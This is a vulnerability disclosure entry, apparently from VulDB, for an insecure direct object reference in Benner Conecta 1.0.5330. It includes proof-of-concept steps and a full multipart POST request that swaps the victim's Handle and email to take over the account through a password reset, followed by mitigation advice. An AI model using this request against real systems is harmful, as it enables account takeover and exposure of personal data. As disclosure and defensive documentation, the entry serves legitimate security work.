Submit #501406: benner Benner Conecta 1.0.5330 Insecure Direct Object Reference leads to Account Take Overinfo

Titlebenner Benner Conecta 1.0.5330 Insecure Direct Object Reference leads to Account Take Over
DescriptionIDOR leading to Account Takeover in Benner Conecta Vendor: Benner Affected Version: 1.0.5330.0 Description A critical Insecure Direct Object Reference (IDOR) vulnerability has been identified in the Benner Conecta system, version 1.0.5330.0. This flaw allows an attacker to modify the account details of any user, leading to full account takeover. The vulnerability exists in the endpoint: POST /Usuarios/Usuario/EditarLogado/YOUR-ID-HERE When a user accesses "Minha Conta" → "Editar" and attempts to save changes, the request can be intercepted and modified to target another user's account by changing the Handle parameter. Additionally, the system relies on a __RequestVerificationToken, which is session-bound but can be regenerated by re-accessing the account settings. This allows an attacker to perform multiple unauthorized modifications. Proof of Concept (PoC) Navigate to "Minha Conta" → "Editar" and capture the request using an intercepting proxy (e.g., Burp Suite). Modify the Handle parameter to the victim's user ID. Change the Email field to an attacker-controlled email. Send the modified request while ensuring all headers, cookies, and __RequestVerificationToken remain valid. Initiate the "Forgot Password" process using the newly modified email. Reset the victim's password and gain full control over their account. Example Exploit Request: POST /Usuarios/Usuario/EditarLogado/YOUR-ID-HERE HTTP/2 ------WebKitFormBoundaryYRr42bBaGfIdohAs Content-Disposition: form-data; name="__RequestVerificationToken" YOUR-USEFUL-TOKEN-HERE ------WebKitFormBoundaryYRr42bBaGfIdohAs Content-Disposition: form-data; name="Handle" VICTIM-ID-HERE ------WebKitFormBoundaryYRr42bBaGfIdohAs Content-Disposition: form-data; name="HandleOperadora" ------WebKitFormBoundaryYRr42bBaGfIdohAs Content-Disposition: form-data; name="TemCpf" True ------WebKitFormBoundaryYRr42bBaGfIdohAs Content-Disposition: form-data; name="PodeEditarPapeis" False ------WebKitFormBoundaryYRr42bBaGfIdohAs Content-Disposition: form-data; name="Cnpj" ------WebKitFormBoundaryYRr42bBaGfIdohAs Content-Disposition: form-data; name="ExcluirAvatar" false ------WebKitFormBoundaryYRr42bBaGfIdohAs Content-Disposition: form-data; name="Nome" NAME-HERE ------WebKitFormBoundaryYRr42bBaGfIdohAs Content-Disposition: form-data; name="Cpf" A-REAL-CPF-HERE ------WebKitFormBoundaryYRr42bBaGfIdohAs Content-Disposition: form-data; name="Sexo" Feminino ------WebKitFormBoundaryYRr42bBaGfIdohAs Content-Disposition: form-data; name="RazaoSocial" ------WebKitFormBoundaryYRr42bBaGfIdohAs Content-Disposition: form-data; name="Email" EMAIL-CONTROLLED-BY-THE-ATTACKER-HERE ------WebKitFormBoundaryYRr42bBaGfIdohAs Content-Disposition: form-data; name="EmailSecundario" ------WebKitFormBoundaryYRr42bBaGfIdohAs Content-Disposition: form-data; name="Senha" ------WebKitFormBoundaryYRr42bBaGfIdohAs Content-Disposition: form-data; name="ConfirmacaoSenha" ------WebKitFormBoundaryYRr42bBaGfIdohAs Content-Disposition: form-data; name="TipoUsuario" Secretaria ------WebKitFormBoundaryYRr42bBaGfIdohAs Content-Disposition: form-data; name="AcessoPermitidos" ------WebKitFormBoundaryYRr42bBaGfIdohAs Content-Disposition: form-data; name="CropImage.Width" ------WebKitFormBoundaryYRr42bBaGfIdohAs Content-Disposition: form-data; name="CropImage.Height" ------WebKitFormBoundaryYRr42bBaGfIdohAs Content-Disposition: form-data; name="CropImage.X" ------WebKitFormBoundaryYRr42bBaGfIdohAs Content-Disposition: form-data; name="CropImage.Y" ------WebKitFormBoundaryYRr42bBaGfIdohAs Content-Disposition: form-data; name="CropImage.Image"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundaryYRr42bBaGfIdohAs-- Impact Unauthorized modification of user accounts. Full account takeover by changing the email and resetting the password. Exposure of Personally Identifiable Information (PII). Mitigation Implement proper authorization checks to ensure users can only modify their own data. Use server-side validation to restrict modifications to the authenticated user's account. Implement role-based access control (RBAC) to prevent privilege escalation. Ensure __RequestVerificationToken is user-specific and bound to the intended account. By: Yago Martins
Source⚠️ https://github.com/yago3008/cves
User
 y4g0 (UID 80480)
Submission02/14/2025 06:55 PM (4 months ago)
Moderation02/24/2025 06:22 PM (10 days later)
StatusAccepted
VulDB Entry296695 [Benner Connecta 1.0.5330 EditarLogado Handle resource injection]
Points20

PreviousOverviewNext

Interested in the pricing of exploits?

See the underground prices here!